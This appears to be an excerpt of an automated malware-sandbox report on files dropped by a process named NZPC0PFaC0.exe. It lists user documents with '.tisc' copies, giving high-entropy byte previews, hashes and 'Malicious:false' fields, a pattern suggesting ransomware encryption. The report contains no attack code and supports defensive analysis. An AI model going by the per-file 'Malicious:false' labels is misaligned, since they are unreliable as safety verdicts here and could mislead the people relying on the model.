                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ku?.j...d"D..d.M/.?iRl......._UY.#....W..2a..x.d.!Lf.......{..% ...~......`L6....._U4LpCx.*X.5-..b... i..x......#.\..)...b.}[..bF....|F.^).q.s.^.5...........7...5.Z0.....U."y.^aT6A......z]..0...".U........(.4..5i.T..%4....d.....a7.y..B...#.s..."jO5s.L..l{..$.9.Jm.Fp..&.'..Sk..u..M.uwl^8....^.S.,.:...Y.C)._..q/R..<..h.{.....1. ...............%.$.2.\xD.7.L..v...[.....\........D~r*:j.6p..N.....Z.... 5..^r.w.,...%.l|.f8...A.v..^Ac3."...*".Y.)#....;B..;.._..2.......R..-..........4.../r>t..E..1..MVJ..w.......M.3.qy.L.>X........W]....[C.9..E._u..B......3.)....!. ...2.**.S.tTb.L....v.,.3X.3$..T.T.......u.s..Y.1....O../}...ns....r5p..r...n..b....s..g..,..V..tL......_7..1F..a.*.YG..[.K.u.&.#!.+.L.r.O......;|..o.F.y.V.9.. .FXR0B.{....2....a:..&..h.R.8~.....U.!.ql......p)...=z...|6..T...h7.~...`3.I...h..#..z3..d.}.~.85..3......Yj..Z..s.N.0.....r.....ymX...z..."5..&E.".a.A..*.\).z~..r.!.LJ..P.93H.`5...X@o....T.J..S..0.CJw]KK.....(.c....i.8=.|...6.
                                                                                    C:\Users\user\Documents\EFOYFBOLXA.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.824635221778756
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:/BtQG19Ue0IQxTIB8FZoGtmzuoB3VhxBQqF7YuNRxFugbD:BTvkMyFZV8uo9VhxBQqvNbFrD
                                                                                    MD5:2565DEE85A2009321F465C65AFDBBA7E
                                                                                    SHA1:61EF27CB437ABC58E9570FD1A0C5423324ACBF8A
                                                                                    SHA-256:8DA1AED9F5BE213384399683D38008E1B4DC9A1E06D59CF52FC4858402022217
                                                                                    SHA-512:10D7F0DE115BC2C1F7722CB651792AB5F000EA8AAA243BDDF9AD4DA0B9E4263379DA2CEE7A68516A5EEB068228BE14ECA8DA0B525FCF2B4FE76DF90FD9AEC424
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ku?.j...d"D..d.M/.?iRl......._UY.#....W..2a..x.d.!Lf.......{..% ...~......`L6....._U4LpCx.*X.5-..b... i..x......#.\..)...b.}[..bF....|F.^).q.s.^.5...........7...5.Z0.....U."y.^aT6A......z]..0...".U........(.4..5i.T..%4....d.....a7.y..B...#.s..."jO5s.L..l{..$.9.Jm.Fp..&.'..Sk..u..M.uwl^8....^.S.,.:...Y.C)._..q/R..<..h.{.....1. ...............%.$.2.\xD.7.L..v...[.....\........D~r*:j.6p..N.....Z.... 5..^r.w.,...%.l|.f8...A.v..^Ac3."...*".Y.)#....;B..;.._..2.......R..-..........4.../r>t..E..1..MVJ..w.......M.3.qy.L.>X........W]....[C.9..E._u..B......3.)....!. ...2.**.S.tTb.L....v.,.3X.3$..T.T.......u.s..Y.1....O../}...ns....r5p..r...n..b....s..g..,..V..tL......_7..1F..a.*.YG..[.K.u.&.#!.+.L.r.O......;|..o.F.y.V.9.. .FXR0B.{....2....a:..&..h.R.8~.....U.!.ql......p)...=z...|6..T...h7.~...`3.I...h..#..z3..d.}.~.85..3......Yj..Z..s.N.0.....r.....ymX...z..."5..&E.".a.A..*.\).z~..r.!.LJ..P.93H.`5...X@o....T.J..S..0.CJw]KK.....(.c....i.8=.|...6.
                                                                                    C:\Users\user\Documents\PIVFAGEAAV.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.856823370779371
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QVQiUjZ3G8E3aqmrxQVoYDpBjUfkiTDYcrMTaBND64c8zNgbD:QmiUNAalxQLHjwkwz8YlcqUD
                                                                                    MD5:726C6396086A81C6336E73D8A69A7CB6
                                                                                    SHA1:3C9E5D2DFD4ED9F881CB9A063D7D3760713A9CF2
                                                                                    SHA-256:F06DB031DB3A9885301F6DD9E371C6F71D79DDF78E1034109BC29874E9A35196
                                                                                    SHA-512:DAB583A1C0FE925CCA118CFD30E31FDBC7442093437AADFB5F7F4ACB629E9836EE4D9A890138CA95A3E6DE968FB4CF0ADDBDD405BC8F59AB8E45D01F592A1AAC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: M.i|.=.....6..]..l...t....Q..D.z.- ..?.LM.T...g4.Wm..X..om..$.B..V/.....J.A.a.p......X."....`v.b.;......gg.G...-Ro.._.../l./......._!..U.Z+<xK.iN......)=.2..b..l......FaJw....%.<.|*.$.n.i...w.|.N@...'h,...4}*..}]T..v.&..t_q{w.....T!....R...@.b.6..+....:..".2.'h.X.0$Lh.....,...C......ljTs.|..N......X.b..0..p.R&...Q....*{m....g..|uD7,I.K_j.LJ.q1C.T)T@ntZxzZ....3..~.5...<G7/./2.V..v1..xn.G...Z......r7B....z}.m.....b2.M..5.V.y...@.j."@.J..2-.....B..!?...\...s...=...m...fD|...;}.A.X.....hz.(..IG.c.F.`!.....PQ.b.....q....=...].~..H../\.p6%.,4......a..S9.._.3...0..,.9,..k.=,.j.nY-....+..aY".uN<@R..R.....i5.F&O...Sa..y.a\..t...t.p....V..X... Z@b..#..!..J\s/z.....`P...`C1IM..>...x.W{....k........y'[E.Bx...G..._`S.L.^I.cC.h...3?.E#...<...J1.".kZ..X..c..Z.xk....iJH.&.=..e...m...G)..}.i.p.........|...=%...[....=......kQ...{....Vh.o.aU............._f..&.@....<7.e.PT..4r..8......:3@.:C'....@vM..m.Uu]...,.....=.....1..)"..."....1..}...=ET.2iy..3.e.k.e.M..w
                                                                                    C:\Users\user\Documents\PIVFAGEAAV.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.856823370779371
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QVQiUjZ3G8E3aqmrxQVoYDpBjUfkiTDYcrMTaBND64c8zNgbD:QmiUNAalxQLHjwkwz8YlcqUD
                                                                                    MD5:726C6396086A81C6336E73D8A69A7CB6
                                                                                    SHA1:3C9E5D2DFD4ED9F881CB9A063D7D3760713A9CF2
                                                                                    SHA-256:F06DB031DB3A9885301F6DD9E371C6F71D79DDF78E1034109BC29874E9A35196
                                                                                    SHA-512:DAB583A1C0FE925CCA118CFD30E31FDBC7442093437AADFB5F7F4ACB629E9836EE4D9A890138CA95A3E6DE968FB4CF0ADDBDD405BC8F59AB8E45D01F592A1AAC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: M.i|.=.....6..]..l...t....Q..D.z.- ..?.LM.T...g4.Wm..X..om..$.B..V/.....J.A.a.p......X."....`v.b.;......gg.G...-Ro.._.../l./......._!..U.Z+<xK.iN......)=.2..b..l......FaJw....%.<.|*.$.n.i...w.|.N@...'h,...4}*..}]T..v.&..t_q{w.....T!....R...@.b.6..+....:..".2.'h.X.0$Lh.....,...C......ljTs.|..N......X.b..0..p.R&...Q....*{m....g..|uD7,I.K_j.LJ.q1C.T)T@ntZxzZ....3..~.5...<G7/./2.V..v1..xn.G...Z......r7B....z}.m.....b2.M..5.V.y...@.j."@.J..2-.....B..!?...\...s...=...m...fD|...;}.A.X.....hz.(..IG.c.F.`!.....PQ.b.....q....=...].~..H../\.p6%.,4......a..S9.._.3...0..,.9,..k.=,.j.nY-....+..aY".uN<@R..R.....i5.F&O...Sa..y.a\..t...t.p....V..X... Z@b..#..!..J\s/z.....`P...`C1IM..>...x.W{....k........y'[E.Bx...G..._`S.L.^I.cC.h...3?.E#...<...J1.".kZ..X..c..Z.xk....iJH.&.=..e...m...G)..}.i.p.........|...=%...[....=......kQ...{....Vh.o.aU............._f..&.@....<7.e.PT..4r..8......:3@.:C'....@vM..m.Uu]...,.....=.....1..)"..."....1..}...=ET.2iy..3.e.k.e.M..w
                                                                                    C:\Users\user\Documents\PWCCAWLGRE.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849725500908567
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:wlSB3wbWLoiIM5R4SxQqJzPUAJoPcWvaWlmti2wrfmYEaS79igbD:bAPiIM5RbxQqJzPxecWvdlm0fmYmtD
                                                                                    MD5:C7E879AF05B59E19EA66397EACA1E007
                                                                                    SHA1:35DEE43FF23FFB82390E2295B9D106E5C9A69EC6
                                                                                    SHA-256:525BA4AB5EF23E0F3A23AB577F23C9008FD5310E49715F219ADB9464B88FE4D7
                                                                                    SHA-512:1CB97684E89E733DF94B1A0B524EA1B48FC8CAB5E9BF6B6D114BEE80CC6D2B59C3BAD38E2AE1AF8A4D053225FB59FFF570FEB5A61A2BF81D3269524B4DA71829
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: B.^..{kl.Q..5....F7j..\i..f3n..wkA@.(..#.......l.$.........)...c...BP$..x.3.G.$e..Y.MC.w.....n..x.|.........Q..1..%8..+.....]../..F..rys.$i..8..2.5O..!...@I. ..Y"g].R.I=R....'.........^.......V.w|...o.O.p...>.g.!...n...W.Xh.0.,n..F.@....*>.W.KYm....$..R.........b..tN.....!..y.k...`..W.u.3hr.O.].r....!|.b.<.....^.....G.Xo.7.6N........).Y.........H.iz...a...$!b.P..3S.}1/.-Ta.....ZJsj.p......T&5N<.-o....a..m.F\....W.K&I@.KM;Dz..E9...~i....4].Z....=.....y.....N.En.\...Z.GF...e"8Z..$0.,..Zl;.L...N.k.......].g........A..._g4.....9....mI.-,.i..%@...LJs.M{..)X.....(#.O. .. .}i(;$.._/........G.%.+.J....Q..H.,V.\.e.........l}P.o#l....r...Qv....G..H....?.k.8..do~..v...th.oa.|b...u|...s.........)...V/_......b...^J...l..X...G*n..._.X..qA.....x#.......bu.....Ud:..4G..%V..?F.bI.l/|.@$Yc'...g......O..5..u{...B..7.@.t.l*......9i.S.~d,iD..5.fr..>..T.>......M...C.^X..j..2.V.?.m$}..D........_j. b...H.....;*1m.a.I.CDM...t.#@>..J....x.`.~.
                                                                                    C:\Users\user\Documents\PWCCAWLGRE.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849725500908567
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:wlSB3wbWLoiIM5R4SxQqJzPUAJoPcWvaWlmti2wrfmYEaS79igbD:bAPiIM5RbxQqJzPxecWvdlm0fmYmtD
                                                                                    MD5:C7E879AF05B59E19EA66397EACA1E007
                                                                                    SHA1:35DEE43FF23FFB82390E2295B9D106E5C9A69EC6
                                                                                    SHA-256:525BA4AB5EF23E0F3A23AB577F23C9008FD5310E49715F219ADB9464B88FE4D7
                                                                                    SHA-512:1CB97684E89E733DF94B1A0B524EA1B48FC8CAB5E9BF6B6D114BEE80CC6D2B59C3BAD38E2AE1AF8A4D053225FB59FFF570FEB5A61A2BF81D3269524B4DA71829
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: B.^..{kl.Q..5....F7j..\i..f3n..wkA@.(..#.......l.$.........)...c...BP$..x.3.G.$e..Y.MC.w.....n..x.|.........Q..1..%8..+.....]../..F..rys.$i..8..2.5O..!...@I. ..Y"g].R.I=R....'.........^.......V.w|...o.O.p...>.g.!...n...W.Xh.0.,n..F.@....*>.W.KYm....$..R.........b..tN.....!..y.k...`..W.u.3hr.O.].r....!|.b.<.....^.....G.Xo.7.6N........).Y.........H.iz...a...$!b.P..3S.}1/.-Ta.....ZJsj.p......T&5N<.-o....a..m.F\....W.K&I@.KM;Dz..E9...~i....4].Z....=.....y.....N.En.\...Z.GF...e"8Z..$0.,..Zl;.L...N.k.......].g........A..._g4.....9....mI.-,.i..%@...LJs.M{..)X.....(#.O. .. .}i(;$.._/........G.%.+.J....Q..H.,V.\.e.........l}P.o#l....r...Qv....G..H....?.k.8..do~..v...th.oa.|b...u|...s.........)...V/_......b...^J...l..X...G*n..._.X..qA.....x#.......bu.....Ud:..4G..%V..?F.bI.l/|.@$Yc'...g......O..5..u{...B..7.@.t.l*......9i.S.~d,iD..5.fr..>..T.>......M...C.^X..j..2.V.?.m$}..D........_j. b...H.....;*1m.a.I.CDM...t.#@>..J....x.`.~.
                                                                                    C:\Users\user\Documents\QCFWYSKMHA.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826016366757798
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:GElrSI02SxBmilzChopuQl9+641uS3RjbeALmX7agbD:55SLNzzCh0pav1uS3durXD
                                                                                    MD5:2FF2E3B5D15FD10578EDC479CB459AF4
                                                                                    SHA1:45CB4C5216D696435D2999425E29DE4AE6F14533
                                                                                    SHA-256:C2DAE22A1917B37C0A0898F372BDBAF3E5D072AD3A500AB5D97E994B6C45BC29
                                                                                    SHA-512:709DD5AEB3C58E13E39B061C01C7C5038D29A98C1A76EB050F331CD55FBA8C93A1FB1342E0DC7CFD47C1D387D1E7DF4241FD3CC942B38F1573CF005FB5048580
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ,....p.}....<....T.w.3|J&.....:C.q..%E.....s..#..].2....`2R...H....n.]..Y...-....,u.$vLc..jj..'o2%.7...0...f.</W.X.9...59n.Zh..?F....:..fx...(Z44..A.=...S.!.T.. M....h.7.q.;...$K...d...j..KW/..9.(..m.s.5..b..(<.2...YMg[.`..!.<.ip..(.........s4U}.........s.e..[..N..U]U.oc.Lm*.[..?....UfN3..F.7...8......'...j.e.!../..xu.....$8.\...1.5.=f...B..k....}&X.....[..].y.n0S......../.+.=}p.a.b.S\..........\6...r.}..1..#.e.6B,.T6./.....K4.(TS....o... .L}RG.F..w...*.*.b.H..E....f.. ..`r....N._$..w.o.'.c....6.....8...1..^@...j..d.C.~I.N.....bJ...\.6A.o..LV[A]..m..._....w......ed.n>..q."_M.6l.ZA5....M...@..=..il.n.,...9II..&.E@..Z'...Z....N.....?...d..|.Bk........q&.X .9~._(.....q.....<E...Y...f%.lp"X28.........v.vc.Q...f...3Y..s4eh.w6.&.`..y.?m..Z^..S$.\.r....G.[u.......v.@s.C..eu.S...1..R3U..G|e....'...?tt.m;...>5..a.....w.AF..........'.#W....B'.st..Q......J[.;..F.Q.....[?.V.'4..d4_ifLs#pJP...z.Z.!qit,.h.g.p..F...a....wH..nYJ../>..r..8...f]_...3.[
                                                                                    C:\Users\user\Documents\QCFWYSKMHA.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826016366757798
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:GElrSI02SxBmilzChopuQl9+641uS3RjbeALmX7agbD:55SLNzzCh0pav1uS3durXD
                                                                                    MD5:2FF2E3B5D15FD10578EDC479CB459AF4
                                                                                    SHA1:45CB4C5216D696435D2999425E29DE4AE6F14533
                                                                                    SHA-256:C2DAE22A1917B37C0A0898F372BDBAF3E5D072AD3A500AB5D97E994B6C45BC29
                                                                                    SHA-512:709DD5AEB3C58E13E39B061C01C7C5038D29A98C1A76EB050F331CD55FBA8C93A1FB1342E0DC7CFD47C1D387D1E7DF4241FD3CC942B38F1573CF005FB5048580
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ,....p.}....<....T.w.3|J&.....:C.q..%E.....s..#..].2....`2R...H....n.]..Y...-....,u.$vLc..jj..'o2%.7...0...f.</W.X.9...59n.Zh..?F....:..fx...(Z44..A.=...S.!.T.. M....h.7.q.;...$K...d...j..KW/..9.(..m.s.5..b..(<.2...YMg[.`..!.<.ip..(.........s4U}.........s.e..[..N..U]U.oc.Lm*.[..?....UfN3..F.7...8......'...j.e.!../..xu.....$8.\...1.5.=f...B..k....}&X.....[..].y.n0S......../.+.=}p.a.b.S\..........\6...r.}..1..#.e.6B,.T6./.....K4.(TS....o... .L}RG.F..w...*.*.b.H..E....f.. ..`r....N._$..w.o.'.c....6.....8...1..^@...j..d.C.~I.N.....bJ...\.6A.o..LV[A]..m..._....w......ed.n>..q."_M.6l.ZA5....M...@..=..il.n.,...9II..&.E@..Z'...Z....N.....?...d..|.Bk........q&.X .9~._(.....q.....<E...Y...f%.lp"X28.........v.vc.Q...f...3Y..s4eh.w6.&.`..y.?m..Z^..S$.\.r....G.[u.......v.@s.C..eu.S...1..R3U..G|e....'...?tt.m;...>5..a.....w.AF..........'.#W....B'.st..Q......J[.;..F.Q.....[?.V.'4..d4_ifLs#pJP...z.Z.!qit,.h.g.p..F...a....wH..nYJ../>..r..8...f]_...3.[
                                                                                    C:\Users\user\Documents\QCFWYSKMHA.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854036739782813
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:3ZGcl7W6qYXcrcOLPq/wXczKXDjsDvP6xZNBU/d3CPPA7hoIQYIPlIIBSm8oq3sw:pGc06xQ7LFUojsDyFWiov7oQT3TD
                                                                                    MD5:9B5A125B8A56737B380BA889A13CF25C
                                                                                    SHA1:5AFF943EA132FBDC150ACC65886CCA1F40BEF225
                                                                                    SHA-256:FFA2B0BCBDB9601831628A87D14D1C4510D392C57B9EBB9E76798CB4E9C786BA
                                                                                    SHA-512:FE2D83A5D4D915723FF2F81E3E73EDA943A622998677625B7D8299552F4D1A396E412DD3542C28F3C89FE226F9505074304466BEFFEC9F0E60C017B50F8077FB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .9.*E.....|%wb.2..Tg...jb.3[e.......K.}..u~....6.R..8(-..T ..]d..... ..q.?.G..........S..<x.,...[.%d4..7..uK.B3.w..B..n...o.......r...F...3.Y.n.u....I?kJ.\.`..A#i...H.......*.]........d....U.]..h.......L.w...4m8.......Y..LC....}.NR.>^.&.`..(...azO^5]....//..mvj^J|......V.B...|...\X\l.B.V/.>.zaHf...&.$...gM........u,.FV.X..q...Nu.........V..|.6.P.$..........~/.q..m...x+Y.!...U.#...".5.Gj......t`...2..lF....'.rI...J9../.&.K.K-.05.g../...q..p.].;.y+>X.r..H{..Qa...."Zj..q....)..G..e..(...7.T.....*u.......L3W......@...6.+q..u.......4C..yAy... +?Ec.....P"{O...sq......4..K...}3.....-[.]..9i...C[)...5... ....O.(.......u.G..H2.........p.h.n=]...D.&X{..s7bR.9g.&.o...R.k}>..<..MO..$.b.9\.r.....&....f....6...`......n.D.R8.I0.$.-.......'[.......ygX...$....^UA...Gf.)p.!............!Ux...&.Z+...t.5.f.[-D...+cQ....Nj.{f.....L,W8.....E.........a.....=..o.'.u......`..9lj:N.q./...f..]._.C1.4.YF.-.......Wq...W.k...B..!9.n.Q..|....jc...y..........`.y.
                                                                                    C:\Users\user\Documents\QCFWYSKMHA.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854036739782813
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:3ZGcl7W6qYXcrcOLPq/wXczKXDjsDvP6xZNBU/d3CPPA7hoIQYIPlIIBSm8oq3sw:pGc06xQ7LFUojsDyFWiov7oQT3TD
                                                                                    MD5:9B5A125B8A56737B380BA889A13CF25C
                                                                                    SHA1:5AFF943EA132FBDC150ACC65886CCA1F40BEF225
                                                                                    SHA-256:FFA2B0BCBDB9601831628A87D14D1C4510D392C57B9EBB9E76798CB4E9C786BA
                                                                                    SHA-512:FE2D83A5D4D915723FF2F81E3E73EDA943A622998677625B7D8299552F4D1A396E412DD3542C28F3C89FE226F9505074304466BEFFEC9F0E60C017B50F8077FB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .9.*E.....|%wb.2..Tg...jb.3[e.......K.}..u~....6.R..8(-..T ..]d..... ..q.?.G..........S..<x.,...[.%d4..7..uK.B3.w..B..n...o.......r...F...3.Y.n.u....I?kJ.\.`..A#i...H.......*.]........d....U.]..h.......L.w...4m8.......Y..LC....}.NR.>^.&.`..(...azO^5]....//..mvj^J|......V.B...|...\X\l.B.V/.>.zaHf...&.$...gM........u,.FV.X..q...Nu.........V..|.6.P.$..........~/.q..m...x+Y.!...U.#...".5.Gj......t`...2..lF....'.rI...J9../.&.K.K-.05.g../...q..p.].;.y+>X.r..H{..Qa...."Zj..q....)..G..e..(...7.T.....*u.......L3W......@...6.+q..u.......4C..yAy... +?Ec.....P"{O...sq......4..K...}3.....-[.]..9i...C[)...5... ....O.(.......u.G..H2.........p.h.n=]...D.&X{..s7bR.9g.&.o...R.k}>..<..MO..$.b.9\.r.....&....f....6...`......n.D.R8.I0.$.-.......'[.......ygX...$....^UA...Gf.)p.!............!Ux...&.Z+...t.5.f.[-D...+cQ....Nj.{f.....L,W8.....E.........a.....=..o.'.u......`..9lj:N.q./...f..]._.C1.4.YF.-.......Wq...W.k...B..!9.n.Q..|....jc...y..........`.y.
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\BJZFPPWAPT.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849980378540775
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:XXhw3mI/pR9p0ArP1d9CLbPMBla/SA8vj/6XIa831qY0u1gTOnBFCpfN8g5YgbD:XRwp/nfP1/CL7MBJN00B0unARD
                                                                                    MD5:250DB6B76D758286E425C4166B9EF480
                                                                                    SHA1:C1F5FA6ADF9BACBC3152700C2DB377ACB5AE59C7
                                                                                    SHA-256:CA1B805F5230EBBD8CCE27B2CE306007B013ECAF0B71E6A087B8CB04044C9EA0
                                                                                    SHA-512:CF843B7E1F61437A89B7D7147A1C9808B9FC656604CDCC2BD3BE76421E8307C8FF29FF532858BEB524CE0BB7658ECD107DF0794ECC52DA18EEAB53BF35CEF77E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....]....f.{.....8.d...KJ..]....>e..e....s..r.z...!..Y;....`...u...<..d..v..~..^.^A....o..h.%~Z`.]...3.s.....pc..$..-7...y5......a.q.X}].565KZ1...UF.0V..!...*~.ag...-.RC.^.....`T.d.A....D...`..W#.B.S4"A`.zI.._..jo6.........m..qJ.-=s..........5...6..C.."....e.K..S.#.|.Z$.. ..L..^I.........u......ab.P..|F...s.{.-......{.?..E/..d.......M..|.....W.~....&g....!..7.GA.;..{...D..j....N............z...~%&...J........]...7.......m.\...Y....L.......8.._,...&...7...8.../..EG.R).*..ooD....{..-....~........P..ymf.dRt.9.......T.....|((.2.&R...On..Y./..i.u.u..C....J..#./.....J.t...T.YH.I9.8..w.]. }.E....u3..uW.x...Hz.[!#.0t...'Q...?Zeg=...,_..6t..=.W...f..P_..pp..._.UP.#;.|v.*.SG.._.......]....#..z......V..2.<...BR.x$...`.h.y.z.=...<..H...*..[."....G...|d....y..Y.6W.1.K.vv`<...WD.hB..rO|.......:.]...^"y.......a.q.r....@...$.^.....a..n..]w..0..9..l-H..#.}Z...............@.s....Um.R..w.FE.......m..t..h. ~.wl..lf...'.tX.Zd......h7...;....x.=.^.c...
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\BJZFPPWAPT.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849980378540775
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:XXhw3mI/pR9p0ArP1d9CLbPMBla/SA8vj/6XIa831qY0u1gTOnBFCpfN8g5YgbD:XRwp/nfP1/CL7MBJN00B0unARD
                                                                                    MD5:250DB6B76D758286E425C4166B9EF480
                                                                                    SHA1:C1F5FA6ADF9BACBC3152700C2DB377ACB5AE59C7
                                                                                    SHA-256:CA1B805F5230EBBD8CCE27B2CE306007B013ECAF0B71E6A087B8CB04044C9EA0
                                                                                    SHA-512:CF843B7E1F61437A89B7D7147A1C9808B9FC656604CDCC2BD3BE76421E8307C8FF29FF532858BEB524CE0BB7658ECD107DF0794ECC52DA18EEAB53BF35CEF77E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....]....f.{.....8.d...KJ..]....>e..e....s..r.z...!..Y;....`...u...<..d..v..~..^.^A....o..h.%~Z`.]...3.s.....pc..$..-7...y5......a.q.X}].565KZ1...UF.0V..!...*~.ag...-.RC.^.....`T.d.A....D...`..W#.B.S4"A`.zI.._..jo6.........m..qJ.-=s..........5...6..C.."....e.K..S.#.|.Z$.. ..L..^I.........u......ab.P..|F...s.{.-......{.?..E/..d.......M..|.....W.~....&g....!..7.GA.;..{...D..j....N............z...~%&...J........]...7.......m.\...Y....L.......8.._,...&...7...8.../..EG.R).*..ooD....{..-....~........P..ymf.dRt.9.......T.....|((.2.&R...On..Y./..i.u.u..C....J..#./.....J.t...T.YH.I9.8..w.]. }.E....u3..uW.x...Hz.[!#.0t...'Q...?Zeg=...,_..6t..=.W...f..P_..pp..._.UP.#;.|v.*.SG.._.......]....#..z......V..2.<...BR.x$...`.h.y.z.=...<..H...*..[."....G...|d....y..Y.6W.1.K.vv`<...WD.hB..rO|.......:.]...^"y.......a.q.r....@...$.^.....a..n..]w..0..9..l-H..#.}Z...............@.s....Um.R..w.FE.......m..t..h. ~.wl..lf...'.tX.Zd......h7...;....x.=.^.c...
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.829319622841176
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:1526mlbikwQVkrCBxngHNLxdostvQqTiIG9evvdZ4Vg28i5gYZzfjEkZFiDd4gbD:152nGkw7rC7ngHXtot9uvdZ+g2ngYZ/8
                                                                                    MD5:AF5015584C37C64CFF4641D13F419629
                                                                                    SHA1:E0A748F6C45DCFAE195647D3341258A73B6F3AD3
                                                                                    SHA-256:5B3CE4909A591E4E50382FBA720F0B7094496597BDA8B2CA2269B0984093767F
                                                                                    SHA-512:FC227643679022CF1086BFB8D76B2BAC9643E2FAEE0D9F0ED10F3FA7B50180132E87EE55791AC0DE317CB1490775B5029A40DEF12F0FF7D908B4F043CF9DAF73
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .G..#...h.u....D...H2....ZQ.X...e...z.`s...5..:..@. .-L...U....l.FW.....fp..&.z{.e.3..N.+...cj.25}....bU...?...,...GQ}...$...,vI...28.....f..(..52+~....O..'.{..fr..[..t...7....`.E...!.kE..V..Bo..=....h.q.C..!.+h.....Vp..M.k....6..f.0zo.%H.S.F..'..;f.*64.R_....1=.......Z.>..f...Lf.".....x...r....}..?..L 8G.y...1[........I.O.g.-t.-7.y.l.5......a_...,.)..s.....P.c....1H$E...M<...y.L.&.Y..F...{.......F.P.2.8.f.....t....j....t..*.M..zS.{..y..C.h.k..TM'C..}..jv..E}..K.f#'..:..y..(..1......rYJo..&......U.U........a.W.4D..O.c...Y>.R(+mRgb#$..<.Y./._....io..f.....W#..)..r5k.A.~..b..+....Y.|.....p.+....9.)rH.n}..>8H$f[....~z`M}0..."+A...X|.4K!'...K.. K.iJ.jF.@Q...:..nsM..IQ.I..&..w2...r ...ZfI:..I(`}0..*{2.u..}).lJaI.....<.. ......W.X...4DYU..B...-...r.dp@55K.0A.2...*.]..'......L....:j.P;.._........o.z?.8..hG..-..#.n.....x.j...bN..1@....\..#...bD........3.xT..@%\%..Kl......#O..%......v........:j+......8%.uP.S6.r.O.&...W;9G.....D......3Y.Mj..$
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.829319622841176
                                                                                    Encrypted:false
